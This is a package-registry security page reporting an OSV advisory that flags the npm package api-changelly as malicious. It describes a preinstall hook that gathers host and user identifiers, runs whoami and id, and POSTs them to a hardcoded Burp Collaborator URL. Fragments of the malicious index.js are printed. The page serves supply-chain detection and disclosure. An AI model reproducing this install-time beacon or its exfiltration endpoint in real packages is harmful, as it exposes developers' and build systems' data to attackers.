registry  /  api-changelly  /  19.2.11

api-changelly@19.2.11

OSV Malicious Advisory

scanned 2h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-10200 confirms this npm version as malicious. The package declares `preinstall: node index.js`, which runs automatically on `npm install`. index.js collects installer identifiers (os.hostname(), os.platform(), os.arch(), os.userInfo() username/uid/gid/shell, home directory, cwd) and executes `whoami` and `id` via child_process.exec, capturing their output...

Advisory
MAL-2026-10200
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in api-changelly (npm)
Details
The package declares `preinstall: node index.js`, which runs automatically on `npm install`. index.js collects installer identifiers (os.hostname(), os.platform(), os.arch(), os.userInfo() username/uid/gid/shell, home directory, cwd) and executes `whoami` and `id` via child_process.exec, capturing their output. The combined JSON payload is POSTed to a hardcoded Burp Collaborator subdomain `https://1439tg4d02vixhxuj0gadpml4ca3ytmi.oastify.com/detox56`. The package name `api-changelly` impersonates the Changelly crypto-exchange brand and ships no legitimate functionality — the only behavior is the install-time beacon. This is the canonical dependency-confusion / reconnaissance-beacon shape targeting internal build systems that may resolve a private `changelly`-family dependency to this public package.
Decision reason
One or more suspicious static signals were detected.

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessNetwork
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 3.01 KB of source, external domains: 1439tg4d02vixhxuj0gadpml4ca3ytmi.oastify.com

Source & flagged code

2 flagged · loading source
package.jsonView file
scripts.preinstall = node index.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
index.jsView file
1const { exec } = require('child_process'); L2: const os = require('os'); L3: const https = require('https'); L4: const http = require('http'); ... L12: return new Promise((resolve, reject) => { L13: exec(command, (error, stdout, stderr) => { L14: if (error) { ... L30: pwd: '', L31: hostname: os.hostname(), L32: platform: os.platform(), ... L98: if (res.statusCode >= 200 && res.statusCode < 300) { L99: resolve({ statusCode: res.statusCode, body: responseData });
High
Sandbox Evasion Gated Capability

Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.

index.jsView on unpkg · L1

Findings

2 High2 Medium3 Low
HighInstall Time Lifecycle Scriptspackage.json
HighSandbox Evasion Gated Capabilityindex.js
MediumNetwork
MediumStructural Risk Force Deep Review
LowScripts Present
LowHigh Entropy Strings
LowUrl Strings